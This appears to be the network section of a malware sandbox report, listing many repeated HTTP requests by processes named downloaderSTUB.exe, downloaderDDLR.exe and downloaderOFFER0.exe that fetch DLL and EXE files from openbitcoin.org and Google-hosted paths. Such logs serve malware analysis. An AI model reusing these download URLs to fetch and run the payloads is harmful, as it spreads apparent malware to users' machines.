    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:44 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:44 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:44 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 8
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 12
  • flag-gb
    GET
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 11
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 10
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 10
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 16
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:51 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 12
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:49 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 12
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:49 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 12
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 12
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 15
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:52 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:54 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 15
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:53 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 16
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:53 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 16
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 16
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:53 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 16
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
